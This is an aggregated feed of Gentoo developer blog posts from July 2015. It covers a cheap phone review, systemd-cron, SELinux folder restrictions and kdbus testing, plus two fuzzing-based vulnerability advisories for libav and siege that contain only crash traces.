
Contributors:
. Aaron W. Swenson
. Agostino Sarubbo
. Alec Warner
. Alex Alexander
. Alex Legler
. Alexey Shvetsov
. Alexis Ballier
. Alexys Jacob
. Amadeusz Żołnowski
. Andreas K. Hüttel
. Andreas Proschofsky
. Anthony Basile
. Arun Raghavan
. Bernard Cafarelli
. Bjarke Istrup Pedersen
. Brent Baude
. Brian Harring
. Christian Ruppert
. Chí-Thanh Christopher Nguyễn
. Daniel Gryniewicz
. David Abbott
. Denis Dupeyron
. Detlev Casanova
. Diego E. Pettenò
. Domen Kožar
. Donnie Berkholz
. Doug Goldstein
. Eray Aslan
. Fabio Erculiani
. Gentoo Haskell Herd
. Gentoo Monthly Newsletter
. Gentoo News
. Gilles Dartiguelongue
. Greg KH
. Hanno Böck
. Hans de Graaff
. Ian Whyman
. Ioannis Aslanidis
. Jan Kundrát
. Jason Donenfeld
. Jeffrey Gardner
. Jeremy Olexa
. Joachim Bartosik
. Johannes Huber
. Jonathan Callen
. Jorge Manuel B. S. Vicetto
. Joseph Jezak
. Kenneth Prugh
. Kristian Fiskerstrand
. Lance Albertson
. Liam McLoughlin
. LinuxCrazy Podcasts
. Luca Barbato
. Luis Francisco Araujo
. Mark Loeser
. Markos Chandras
. Mart Raudsepp
. Matt Turner
. Matthew Marlowe
. Matthew Thode
. Matti Bickel
. Michael Palimaka
. Michal Hrusecky
. Michał Górny
. Mike Doty
. Mike Gilbert
. Mike Pagano
. Nathan Zachary
. Ned Ludd
. Nirbheek Chauhan
. Pacho Ramos
. Patrick Kursawe
. Patrick Lauer
. Patrick McLean
. Pavlos Ratis
. Paweł Hajdan, Jr.
. Petteri Räty
. Piotr Jaroszyński
. Rafael Goncalves Martins
. Raúl Porcel
. Remi Cardona
. Richard Freeman
. Robin Johnson
. Ryan Hill
. Sean Amoss
. Sebastian Pipping
. Steev Klimaszewski
. Stratos Psomadakis
. Sune Kloppenborg Jeppesen
. Sven Vermeulen
. Sven Wegener
. Thomas Kahle
. Tiziano Müller
. Tobias Heinlein
. Tobias Klausmann
. Tom Wijsman
. Tomáš Chvátal
. Vikraman Choudhury
. Vlastimil Babka
. Zack Medico

Last updated:
July 29, 2015, 04:06 UTC

Disclaimer:
Views expressed in the content published here do not necessarily represent the views of Gentoo Linux or the Gentoo Foundation.


Bugs? Comments? Suggestions? Contact us!

Powered by:
Planet Venus

Welcome to Gentoo Universe, an aggregation of weblog articles on all topics written by Gentoo developers. For a more refined aggregation of Gentoo-related topics only, you might be interested in Planet Gentoo.

July 27, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)

One in every 600 websites has .git exposed
http://www.jamiembrown.com/blog/one-in-every-600-websites-has-git-exposed/

July 25, 2015
Doogee Y100 Pro (July 25, 2015, 23:37 UTC)

For a while, I have been looking for a replacement for my Nexus 4. I have been mostly pleased with it, but not completely. The two things that bothered me most were the lack of dual-SIM and (usable) LTE.

So I ordered a Doogee Valencia2 Y100 Pro at Gearbest when it was announced in June; it seemed to be almost the perfect device for my needs, and at 119 USD it was quite inexpensive too.

Pre-ordering a phone from a Chinese manufacturer without any existing user reports is quite a risk. Occasionally, these phones turn out to be not working well and getting after-sales support or even updates can be difficult. I decided to take the plunge anyway.

Two very good reviews have been published on YouTube in the meantime. You may want to check them out:


My phone arrived two days ago, so here are my initial impressions:

The package contents

The phone came with a plastic hardcover and screen protector attached. In the box there was a charger and USB cable, headphones, a second screen protector and an instruction manual.

Gearbest also included a travel adaptor for the charger. Some assembly required.

 

Phone specs: Advertisement and reality

The advertised specs of the phone (5" 720p screen, MT6735 64-bit quad-core, 13 MP camera, 2200 mAh battery, etc.) sounded almost too good to be true for that price. Unfortunately, they turned out to be exactly that.

The following table shows the advertised specs and the contrast to reality:
advertised | actual | remarks
5" 1280x720 IPS capacitive 5-point touch screen | 5" 1280x720 IPS capacitive 5-point touch screen |
Mediatek MT6735 64-bit, 1.0 GHz | Mediatek MT6735P, 1.0 GHz; phone comes with 32-bit Android installed | Clock frequency was originally advertised as 1.3 GHz, but later changed without notice to 1.0 GHz. The MT6735P has a slower GPU than the MT6735.
2 GB RAM, 16 GB flash memory | 2 GB RAM, 16 GB flash memory |
13 MP rear, 8 MP front camera | 13 MP and 8 MP are most likely only interpolated |
2200 mAh battery | 1800 mAh battery | There is a sticker on the battery which says 2200 mAh, but when you peel it off it reveals the manufacturer label, which says 1800 mAh.
Weight: 151 g including battery | Weight: 159 g including battery | (picture of phone on a kitchen scale)

This kind of exaggeration appears to be common for phones in the Chinese domestic market. But some folks still need to learn that when doing business internationally, such trickery just hurts your reputation.

With that out of the way, let's take a closer look at the device:

CPU and Linux kernel

$ uname -a
Linux localhost 3.10.65+ #1 SMP PREEMPT Fri Jul 10 20:28:28 CST 2015 armv7l GNU/Linux
shell@Y100pro:/ $ cat /proc/cpuinfo                                        
Processor : ARMv7 Processor rev 4 (v7l)
processor : 0
BogoMIPS : 32.39
Features : swp half thumb fastmult vfp edsp neon vfpv3 tls vfpv4 idiva idivt
CPU implementer : 0x41
CPU architecture: 7
CPU variant : 0x0
CPU part : 0xd03
CPU revision : 4

Hardware : MT6735P
Revision : 0000
Serial : 0000000000000000

Camera


Although the rear camera appears not to have a true 13 MP sensor (the YouTube reviewers above think it is more like 8 MP), it still manages to produce quite acceptable picture quality.


Comparing day and night shots

HDR off / HDR on

Performance

As you would expect, the MT6735P does not particularly shine in benchmarks. The UI nevertheless feels snappy and smooth, and web browsing is fine even on complex websites.


Interim conclusion

Despite the exaggerated (you could also say, dishonest) advertisement, I am satisfied with the Doogee Y100 Pro. You can't really expect more for the price.

What next?

Next I will try to get a Gentoo Prefix up on the device. I will post an update then.

Sebastian Pipping a.k.a. sping (homepage, bugs)

I ran into this on Twitter, found it a very interesting read.

Hacking Team: a zero-day market case study

July 23, 2015
Johannes Huber a.k.a. johu (homepage, bugs)
Tasty calamares in Gentoo (July 23, 2015, 20:36 UTC)

First of all, it's nothing you can eat. So what is it then? This is the introduction by upstream:

Calamares is an installer framework. By design it is very customizable, in order to satisfy a wide variety of needs and use cases. Calamares aims to be easy, usable, beautiful, pragmatic, inclusive and distribution-agnostic. Calamares includes an advanced partitioning feature, with support for both manual and automated partitioning operations. It is the first installer with an automated “Replace Partition” option, which makes it easy to reuse a partition over and over for distribution testing. Got a Linux distribution but no system installer? Grab Calamares, mix and match any number of Calamares modules (or write your own in Python or C++), throw together some branding, package it up and you are ready to ship!

I have just added the newest release version (1.1.2) to the tree, and a live version (9999) to my dev overlay. The underlying technology stack is mainly Qt5, KDE Frameworks, Python 3, YAML and systemd. It has been picked up, and is of course still being evaluated, by several Linux distributions.
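If you just want to take a look at it, installing the release version is a one-liner. This is only a sketch: I am assuming the package sits in the app-admin category (check with eix or equery if it lives elsewhere), and on a stable system you will most likely have to keyword it first:

root # emerge --ask app-admin/calamares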

You may be asking why I have added it to Gentoo at all, given that OpenRC is our default init system. You are right: at the moment it is not very useful for Gentoo itself. But Sabayon, as a downstream of ours, will (maybe) use it for its next releases, so in the first place it is simply a service for our downstreams.

The second reason: there is a discussion on the gentoo-dev mailing list at the moment about rebooting the Gentoo installer. Instead of creating yet another installer implementation, we have two potential ways to pick Calamares up, which are not mutually exclusive:

1. Write modules to make it work with sysvinit aka OpenRC
2. Solve Bug #482702 – Provide alternative stage3 tarballs using sys-apps/systemd

Have fun!

[1] https://calamares.io/about/
[2] johu dev overlay
[3] gentoo-dev ml – Rebooting the Installer Project
[4] Bug #482702 – Provide alternative stage3 tarballs using sys-apps/systemd

July 22, 2015
Alexys Jacob a.k.a. ultrabug (homepage, bugs)

2015-07-22-194644_1047x779_scrot

These are the slides of my EuroPython 2015 talk.

The source code and ansible playbooks are available on github !

July 20, 2015
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)

Since updating to VMware Workstation 11 (from the Gentoo vmware overlay), I've experienced a lot of hangs of my KDE environment whenever a virtual machine was running. Basically my system became unusable, which is bad if your workflow depends on accessing both Linux and (gasp!) Windows 7 (as guest). I first suspected a dbus timeout (doing the "stopwatch test" for 25s waits), but it seems according to some reports that this might be caused by buggy behavior in kwin (4.11.21). Sadly I haven't been able to pinpoint a specific bug report.

Now, I'm not sure if the problem is really 100% fixed, but at least the lags are much smaller now - and here's how to do it (kudos to matthewls and vrenn):

  • Add to /etc/xorg.conf in the Device section
    Option "TripleBuffer" "True"
  • Create a file in /etc/profile.d with content
    __GL_YIELD="USLEEP"
    (yes that starts with a double underscore).
  • Log out, stop your display manager, restart it.
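For the second bullet, a one-liner as root is enough; this is just a sketch, and the file name is arbitrary (anything ending in .sh under /etc/profile.d gets sourced at login):

echo '__GL_YIELD="USLEEP"' > /etc/profile.d/vmware-kwin-workaround.sh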
I'll leave it as an exercise to the reader to figure out what these settings do. (Feel free to explain it in a comment. :) No guarantees of any kind. If this kills kittens you have been warned. Cheers.

July 18, 2015
Richard Freeman a.k.a. rich0 (homepage, bugs)
Running cron jobs as units automatically (July 18, 2015, 16:00 UTC)

I just added sys-process/systemd-cron to the Gentoo repository.  Until now I’ve been running it from my overlay and getting it into the tree was overdue.  I’ve found it to be an incredibly useful tool.

All it does is install a set of unit files and a crontab generator.  The unit files (best used by starting/enabling cron.target) will run jobs from /etc/cron.* at the appropriate times.  The generator can parse /etc/crontab and create timer units for every line dynamically.

Note that the default Gentoo install runs the /etc/cron.* jobs from /etc/crontab, so if you aren't careful you might end up running them twice.  The simplest solutions to this are either to remove those lines from /etc/crontab, or to install systemd-cron with USE=etc-crontab-systemd, which makes the generator ignore /etc/crontab and instead look at /etc/crontab-systemd, where you can install jobs you'd like to run under systemd.
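A minimal setup along those lines might look like this (a sketch; the package and USE flag are the ones described above, and the commands are run as root):

# echo "sys-process/systemd-cron etc-crontab-systemd" >> /etc/portage/package.use/systemd-cron
# emerge --ask sys-process/systemd-cron
# systemctl enable cron.target
# systemctl start cron.target
# systemctl list-timers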

The generator works like you’d expect it to – if you edit the crontab file the units will automatically be created/destroyed dynamically.

One warning about timer units compared to cron jobs is that the jobs are run as services, which means that when the main process dies all its children will be killed.  If you have anything in /etc/cron.* which forks you’ll need to have the main script wait at the end.
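A tiny sketch of such a script (the job name is made up) that behaves the same under classic cron and under a timer-driven service:

#!/bin/sh
# hypothetical /etc/cron.daily/example-backup
# the real job forks into the background...
/usr/local/bin/forking-backup-job &
# ...so wait for it; otherwise systemd considers the service finished
# and kills the remaining child processes
wait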

On the topic of race conditions, each cron.* directory and each /etc/crontab line will create a separate unit.  Those units will all run in parallel (to the extent that one is still running when the next starts), but within a cron.* directory the scripts will run in series.  That may be a bit different from some cron implementations which may limit the number of simultaneous jobs globally.

All the usual timer unit logic applies.  stdout goes to the journal, systemctl list-timers shows what is scheduled, etc.


Filed under: gentoo, linux, systemd

July 17, 2015
Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
OpenLDAP upgrade trap (July 17, 2015, 03:29 UTC)

After spending a few hours trying to figure out why OpenLDAP 2.4 did not want to return any results while 2.3 worked so nicely ...

The following addition to the slapd config file Makes Things Work (tm) - I have no idea if this is actually correct, but now things don't fail.

access to dn.base="dc=example,dc=com"
    by anonymous search
    by * none
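A quick way to check whether anonymous searches are being answered again (base DN as in the ACL above, host adjusted to your setup):

$ ldapsearch -x -H ldap://localhost -b "dc=example,dc=com" -s base dn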
I didn't notice this change in search behaviour in any of the Changelog, Upgrade docs or other documentation - so this is quite 'funny', but not really nice.

July 16, 2015

Description:
Libav is an open source set of tools for audio and video processing.

After talking with Luca Barbato, who is both a Gentoo and a Libav developer, I spent a bit of my time fuzzing libav; in particular I fuzzed libavcodec through avplay.
I hit a crash, and after I reported it to upstream they confirmed the issue as a divide-by-zero.
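For reference, such a fuzzing run is typically set up roughly like this. This is only a sketch, not necessarily the exact command used here: it assumes avplay/libav were rebuilt with afl-gcc as the compiler and that testcases/ holds a few small sample media files:

$ afl-fuzz -i testcases -o findings -- /usr/bin/avplay @@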

The complete gdb output:

ago@willoughby $ gdb --args /usr/bin/avplay avplay.crash 
GNU gdb (Gentoo 7.7.1 p1) 7.7.1
Copyright (C) 2014 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later 
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-pc-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
.
Find the GDB manual and other documentation resources online at:
.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from /usr/bin/avplay...Reading symbols from /usr/lib64/debug//usr/bin/avplay.debug...done.
done.
(gdb) run
Starting program: /usr/bin/avplay avplay.crash
warning: Could not load shared library symbols for linux-vdso.so.1.
Do you need "set solib-search-path" or "set sysroot"?
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib64/libthread_db.so.1".
avplay version 11.3, Copyright (c) 2003-2014 the Libav developers
  built on Jun 19 2015 09:50:59 with gcc 4.8.4 (Gentoo 4.8.4 p1.6, pie-0.6.1)
[New Thread 0x7fffec4c7700 (LWP 7016)]
[New Thread 0x7fffeb166700 (LWP 7017)]
INFO: AddressSanitizer ignores mlock/mlockall/munlock/munlockall
[New Thread 0x7fffe9e28700 (LWP 7018)]
[h263 @ 0x60480000f680] Format detected only with low score of 25, misdetection possible!
[h263 @ 0x60440001f980] Syntax-based Arithmetic Coding (SAC) not supported
[h263 @ 0x60440001f980] Reference Picture Selection not supported
[h263 @ 0x60440001f980] Independent Segment Decoding not supported
[h263 @ 0x60440001f980] header damaged

Program received signal SIGFPE, Arithmetic exception.
[Switching to Thread 0x7fffe9e28700 (LWP 7018)]
0x00007ffff21e3313 in ff_h263_decode_mba (s=s@entry=0x60720005a100) at /tmp/portage/media-video/libav-11.3/work/libav-11.3/libavcodec/ituh263dec.c:142
142     /tmp/portage/media-video/libav-11.3/work/libav-11.3/libavcodec/ituh263dec.c: No such file or directory.
(gdb) bt
#0  0x00007ffff21e3313 in ff_h263_decode_mba (s=s@entry=0x60720005a100) at /tmp/portage/media-video/libav-11.3/work/libav-11.3/libavcodec/ituh263dec.c:142
#1  0x00007ffff21f3c2d in ff_h263_decode_picture_header (s=0x60720005a100) at /tmp/portage/media-video/libav-11.3/work/libav-11.3/libavcodec/ituh263dec.c:1112
#2  0x00007ffff1ae16ed in ff_h263_decode_frame (avctx=0x60440001f980, data=0x60380002f480, got_frame=0x7fffe9e272f0, avpkt=) at /tmp/portage/media-video/libav-11.3/work/libav-11.3/libavcodec/h263dec.c:444
#3  0x00007ffff2cd963e in avcodec_decode_video2 (avctx=0x60440001f980, picture=0x60380002f480, got_picture_ptr=got_picture_ptr@entry=0x7fffe9e272f0, avpkt=avpkt@entry=0x7fffe9e273b0) at /tmp/portage/media-video/libav-11.3/work/libav-11.3/libavcodec/utils.c:1600
#4  0x00007ffff44d4fb4 in try_decode_frame (st=st@entry=0x60340002fb00, avpkt=avpkt@entry=0x601c00037b00, options=) at /tmp/portage/media-video/libav-11.3/work/libav-11.3/libavformat/utils.c:1910
#5  0x00007ffff44ebd89 in avformat_find_stream_info (ic=0x60480000f680, options=0x600a00009e80) at /tmp/portage/media-video/libav-11.3/work/libav-11.3/libavformat/utils.c:2276
#6  0x0000000000431834 in decode_thread (arg=0x7ffff7e0b800) at /tmp/portage/media-video/libav-11.3/work/libav-11.3/avplay.c:2268
#7  0x00007ffff0284b08 in ?? () from /usr/lib64/libSDL-1.2.so.0
#8  0x00007ffff02b4be9 in ?? () from /usr/lib64/libSDL-1.2.so.0
#9  0x00007ffff4e65aa8 in ?? () from /usr/lib/gcc/x86_64-pc-linux-gnu/4.8.4/libasan.so.0
#10 0x00007ffff0062204 in start_thread () from /lib64/libpthread.so.0
#11 0x00007fffefda957d in clone () from /lib64/libc.so.6
(gdb)

Affected version:
11.3 (and possibly earlier versions)

Fixed version:
11.5 and 12.0

Commit fix:
https://git.libav.org/?p=libav.git;a=commitdiff;h=0a49a62f998747cfa564d98d36a459fe70d3299b;hp=6f4cd33efb5a9ec75db1677d5f7846c60337129f

Credit:
This bug was discovered by Agostino Sarubbo of Gentoo.

CVE:
CVE-2015-5479

Timeline:
2015-06-21: bug discovered
2015-06-22: bug reported privately to upstream
2015-06-30: upstream committed the fix
2015-07-14: CVE assigned
2015-07-16: advisory release

Note:
This bug was found with American Fuzzy Lop.
This bug does not affect ffmpeg.

Permalink:
http://blogs.gentoo.org/ago/2015/07/16/libav-divide-by-zero-in-ff_h263_decode_mba

July 15, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Loading CIL modules directly (July 15, 2015, 13:54 UTC)

In a previous post I used the secilc binary to load an additional test policy. Little did I know (and that’s actually embarrassing because it was one of the things I complained about) that you can just use the CIL policy as modules directly.

With this I mean that a CIL policy as mentioned in the previous post can be loaded like a prebuilt .pp module:

~# semodule -i test.cil
~# semodule -l | grep test
test

That’s all that is to it. Loading the module resulted in the test port to be immediately declared and available:

~# semanage port -l | grep test
test_port_t                    tcp      1440

In hindsight, it makes sense that it is this easy. After all, support for the old-style policy language is implemented by converting it into CIL when semodule is called, so it makes sense that a module already written in CIL can be taken up immediately.

July 14, 2015
siege: off-by-one in load_conf() (July 14, 2015, 19:04 UTC)

Description:
Siege is an http load testing and benchmarking utility.

While testing a webserver, I hit a segmentation fault. I recompiled siege with ASan, and it clearly shows an off-by-one in load_conf(). The issue is reproducible without passing any arguments to the binary.
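On Gentoo, one way to rebuild a single package with ASan is via package.env; this is only a sketch (the file names are arbitrary, and the flags assume a reasonably recent gcc or clang):

# /etc/portage/env/asan.conf
CFLAGS="${CFLAGS} -fsanitize=address -ggdb"
CXXFLAGS="${CXXFLAGS} -fsanitize=address -ggdb"
LDFLAGS="${LDFLAGS} -fsanitize=address"

# /etc/portage/package.env
app-benchmarks/siege asan.conf

# then rebuild the package:
# emerge --ask --oneshot app-benchmarks/siege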
The complete output:

ago@willoughby ~ # siege
=================================================================
==488==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000d7f1 at pc 0x00000051ab64 bp 0x7ffcc3d19a70 sp 0x7ffcc3d19a68
READ of size 1 at 0x60200000d7f1 thread T0
#0 0x51ab63 in load_conf /var/tmp/portage/app-benchmarks/siege-3.1.0/work/siege-3.1.0/src/init.c:263:12
#1 0x515486 in init_config /var/tmp/portage/app-benchmarks/siege-3.1.0/work/siege-3.1.0/src/init.c:96:7
#2 0x5217b9 in main /var/tmp/portage/app-benchmarks/siege-3.1.0/work/siege-3.1.0/src/main.c:324:7
#3 0x7fb2b1b93aa4 in __libc_start_main /var/tmp/portage/sys-libs/glibc-2.20-r2/work/glibc-2.20/csu/libc-start.c:289
#4 0x439426 in _start (/usr/bin/siege+0x439426)

0x60200000d7f1 is located 0 bytes to the right of 1-byte region [0x60200000d7f0,0x60200000d7f1)
allocated by thread T0 here:
#0 0x4c03e2 in __interceptor_malloc /var/tmp/portage/sys-devel/llvm-3.6.1/work/llvm-3.6.1.src/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40:3
#1 0x7fb2b1bf31e9 in __strdup /var/tmp/portage/sys-libs/glibc-2.20-r2/work/glibc-2.20/string/strdup.c:42

SUMMARY: AddressSanitizer: heap-buffer-overflow /var/tmp/portage/app-benchmarks/siege-3.1.0/work/siege-3.1.0/src/init.c:263 load_conf
Shadow bytes around the buggy address:
0x0c047fff9aa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9ab0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9ac0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9ad0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9ae0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c047fff9af0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa[01]fa
0x0c047fff9b00: fa fa 03 fa fa fa fd fd fa fa fd fa fa fa fd fd
0x0c047fff9b10: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fd
0x0c047fff9b20: fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff9b30: fa fa fd fa fa fa fd fd fa fa fd fa fa fa fd fa
0x0c047fff9b40: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==488==ABORTING

Affected version:
3.1.0 (and possibly earlier versions).

Fixed version:
Not available.

Commit fix:
Not available.

Credit:
This bug was discovered by Agostino Sarubbo of Gentoo.

CVE:
Not assigned.

Timeline:
2015-06-09: bug discovered
2015-06-10: bug reported privately to upstream
2015-07-13: no upstream response
2015-07-14: advisory release

Permalink:
http://blogs.gentoo.org/ago/2015/07/14/siege-off-by-one-in-load_conf

July 11, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Restricting even root access to a folder (July 11, 2015, 12:09 UTC)

In a comment Robert asked how to use SELinux to prevent even root access to a directory. The trivial solution would be to not assign an administrative role to the root account (which is definitely possible, but then you want some other way to gain administrative access ;-) ).

Restricting root is one of the commonly referred features of a MAC (Mandatory Access Control) system. With a well designed user management and sudo environment, it is fairly trivial – but if you need to start from the premise that a user has direct root access, it requires some thought to implement it correctly. The main “issue” is not that it is difficult to implement policy-wise, but that most users will start from a pre-existing policy (such as the reference policy) and build on top of that.

The use of a pre-existing policy means that some roles are already identified and privileges are already granted to users – often these higher privileged roles are assigned to the Linux root user so as not to confuse users. But it does mean that restricting root's access to a folder requires some additional countermeasures.

The policy

But first things first. Let’s look at a simple policy for restricting access to /etc/private:

policy_module(myprivate, 1.0)

type etc_private_t;
fs_associate(etc_private_t)

This simple policy introduces a type (etc_private_t) which is allowed to be used for files (it associates with a file system). Do not use the files_type() interface as this would assign a set of attributes that many user roles get read access on.
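For completeness, this is roughly how such a module is built and loaded on a refpolicy-based system; a sketch, assuming the policy above is saved as myprivate.te and that you adjust the path to your policy type (strict, targeted, mcs):

~# make -f /usr/share/selinux/strict/include/Makefile myprivate.pp
~# semodule -i myprivate.pp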

Now, it is not sufficient to have the type available. If we want to assign it to a file or directory, someone or something needs the privilege to change the security context of that resource to this type. If we just loaded this policy and tried to do so from a privileged account, it would fail:

~# chcon -t etc_private_t /etc/private
chcon: failed to change context of '/etc/private' to 'system_u:object_r:etc_private_t:s0': Permission denied

With the following rule, the sysadm_t domain (which I use for system administration) is allowed to change the context to etc_private_t:

allow sysadm_t etc_private_t:{dir file} relabelto;

With this in place, the administrator can label resources as etc_private_t without having read access to these resources afterwards. Also, as long as there are no relabelfrom privileges assigned, the administrator cannot revert the context back to a type that he has read access to.

The countermeasures

But this policy is not sufficient. One way that administrators can easily access the resources is to disable SELinux controls (as in, put the system in permissive mode):

~# cat /etc/private/README
cat: /etc/private/README: Permission denied
~# setenforce 0
~# cat /etc/private/README
Hello World!

To prevent this, enable the secure_mode_policyload SELinux boolean:

~# setsebool secure_mode_policyload on

This will prevent any policy and SELinux state manipulation… including permissive mode, but also including loading additional SELinux policies or changing booleans. Definitely experiment with this setting without persisting (i.e. do not use -P in the above command yet) to make sure it is manageable for you.

Still, this isn’t sufficient. Don’t forget that the administrator is otherwise a full administrator – if he cannot access the /etc/private location directly, then he might be able to access it indirectly:

  • If the resource is on a non-critical file system, he can unmount the file system and remount it with a context= mount option. This will override the file-level contexts. Bind-mounting does not seem to allow overriding the context.
  • If the resource is on a file system that cannot be unmounted, the administrator can still reboot the system in a mode where he can access the file system regardless of SELinux controls (either through editing /etc/selinux/config or by booting with enforcing=0, etc.).
  • The administrator can still directly access the block device files on which the resources are stored. Specialized tools can extract files and directories without actually (re)mounting the device.

A more extensive list of methods to potentially gain access to such resources is iterated in Limiting file access with SELinux alone.

This set of methods for gaining access is due to the administrative role already assigned by the existing policy. To further mitigate these risks with SELinux (although SELinux will never completely mitigate all risks) the roles assigned to the users need to be carefully revisited. If you grant people administrative access, but you don’t want them to be able to reboot the system, (re)mount file systems, access block devices, etc. then create a user role that does not have these privileges at all.

Creating such user roles does not require leaving behind the policy that is already active. Additional user domains can be created and granted to Linux accounts (including root). But in my experience, when you need to allow a user to log on as the “root” account directly, you probably need him to have true administrative privileges. Otherwise you’d work with personal accounts and a well-designed /etc/sudoers file.

July 10, 2015
Johannes Huber a.k.a. johu (homepage, bugs)
Plasma 5 and kdbus testing (July 10, 2015, 22:03 UTC)

Thanks to Mike Pagano, who enabled kdbus support in Gentoo kernel sources almost two weeks ago, we now have the choice to test it. As described in Mike's blog post, you will need to enable the USE flags kdbus and experimental on sys-kernel/gentoo-sources, and kdbus on sys-apps/systemd.

root # echo "sys-kernel/gentoo-sources kdbus experimental" >> /etc/portage/package.use/kdbus

If you are running >=sys-apps/systemd-221, kdbus is already enabled by default; otherwise you have to enable it.

root # echo "sys-apps/systemd kdbus" >> /etc/portage/package.use/kdbus

Any packages affected by the change need to be rebuilt.

root # emerge -avuND @world

Enable the kdbus option in the kernel:

General setup --->
<*> kdbus interprocess communication

Build the kernel, install it and reboot. Now we can check if kdbus is enabled properly. systemd should automatically mask dbus.service and start systemd-bus-proxyd.service instead (Thanks to eliasp for the info).

root # systemctl status dbus
● dbus.service
Loaded: masked (/dev/null)
Active: inactive (dead)



root # systemctl status systemd-bus-proxyd
● systemd-bus-proxyd.service - Legacy D-Bus Protocol Compatibility Daemon
Loaded: loaded (/usr/lib64/systemd/system/systemd-bus-proxyd.service; static; vendor preset: enabled)
Active: active (running) since Fr 2015-07-10 22:42:16 CEST; 16min ago
Main PID: 317 (systemd-bus-pro)
CGroup: /system.slice/systemd-bus-proxyd.service
└─317 /usr/lib/systemd/systemd-bus-proxyd --address=kernel:path=/sys/fs/kdbus/0-system/bus
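Another quick sanity check (the path is taken from the proxy's command line above) is to look at the kdbus filesystem itself; if everything is in place you should find at least the bus node of the system bus there:

root # ls /sys/fs/kdbus/0-system
bus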

Plasma 5 starts fine here using sddm as login manager. On Plasma 4 you may be interested in Bug #553460.

Looking forward to when Plasma 5 will get user session support.

Have fun!

Nathan Zachary a.k.a. nathanzachary (homepage, bugs)

Important!

My tech articles—especially Linux ones—are some of the most-viewed on The Z-Issue. If this one has helped you, please consider a small donation to The Parker Fund by using the top widget at the right. Thanks!

For quite some time, I have tried to get links in Thunderbird to open automatically in Chrome or Chromium instead of defaulting to Firefox. Moreover, I have Chromium start in incognito mode by default, and I would like those links to do the same. This has been a problem for me since I don’t use a full desktop environment like KDE, GNOME, or even XFCE. As I’m really a minimalist, I only have my window manager (which is Openbox), and the applications that I use on a regular basis.

One thing I found, though, is that by using PCManFM as my file manager, I do have a few other related applications and utilities that help me customise my workspace and workflows. One such application is libfm-pref-apps, which allows for setting preferred applications. I found that I could do just what I wanted to do without mucking around with manually setting MIME types, writing custom hooks for Thunderbird, or any of that other mess.

Here’s how it was done:

  1. Execute /usr/bin/libfm-pref-apps from your terminal emulator of choice
  2. Under “Web Browser,” select “Customise” from the drop-down menu
  3. Select the “Custom Command Line” tab
  4. In the “Command line to execute” box, type /usr/bin/chromium --incognito --start-maximized %U
  5. In the “Application name” box, type “Chromium incognito” (or however else you would like to identify the application)

Voilà! After restarting Thunderbird, my links opened just like I wanted them to. The only modification that you might need to make is the “Command line to execute” portion. If you use the binary of Chrome instead of building the open-source Chromium browser, you would need to change it to the appropriate executable (and the path may be different for you, depending on your system and distribution). Also, in the command line that I have above, here are some notes about the switches used:

  • --incognito starts Chromium in incognito mode by default (that one should be obvious)
  • --start-maximized makes the browser window open in the full size of your screen
  • %U allows Chromium to accept a URL or list of URLs, and thus, opens the link that you clicked in Thunderbird

Under the hood, it seems like libfm-pref-apps is adding some associations in the ~/.config/mimeapps.list file. The relevant lines that I found were:

[Added Associations]
x-scheme-handler/http=userapp-chromium --incognito --start-maximized-8KZNYX.desktop;
x-scheme-handler/https=userapp-chromium --incognito --start-maximized-8KZNYX.desktop;
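If you are not using PCManFM, you can probably set the same associations directly with xdg-utils. A sketch, assuming you have created your own chromium-incognito.desktop launcher (containing the command line above) in ~/.local/share/applications:

$ xdg-mime default chromium-incognito.desktop x-scheme-handler/http
$ xdg-mime default chromium-incognito.desktop x-scheme-handler/https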

Hope this information helps you get your links to open in your browser of choice (and with the command-line arguments that you want)!

Cheers,
Zach

July 09, 2015
Alexys Jacob a.k.a. ultrabug (homepage, bugs)

In our previous attempt to upgrade our production cluster to 3.0, we had to roll back from the WiredTiger engine on primary servers.

Since then, we switched back our whole cluster to 3.0 MMAPv1 which has brought us some better performances than 2.6 with no instability.

Production checklist

We decided to use this increase in performance to allow us some time to fulfil the entire production checklist from MongoDB, especially the migration to XFS. We’re slowly upgrading our servers kernels and resynchronising our data set after migrating from ext4 to XFS.

Ironically, the strong recommendation of XFS in the production checklist appeared 3 days after our failed attempt at WiredTiger… This is frustrating but gives some kind of hope.

I’ll keep on posting on our next steps and results.

Our hero WiredTiger Replica Set

While we were battling with our production cluster, we got a spontaneous major increase in the daily volumes from another platform which was running on a single Replica Set. This application is write intensive and very disk I/O bound. We were killing the disk I/O with almost a continuous 100% usage on the disk write queue.

Despite our frustration with WiredTiger so far, we decided to give it a chance, considering that this time we were talking about a single Replica Set. We were very happy to see WiredTiger live up to its promises with an almost shocking serenity.

Disk I/O went down dramatically, almost as if nothing was happening any more. Compression did magic on our disk usage and our application went Roarrr !

July 06, 2015
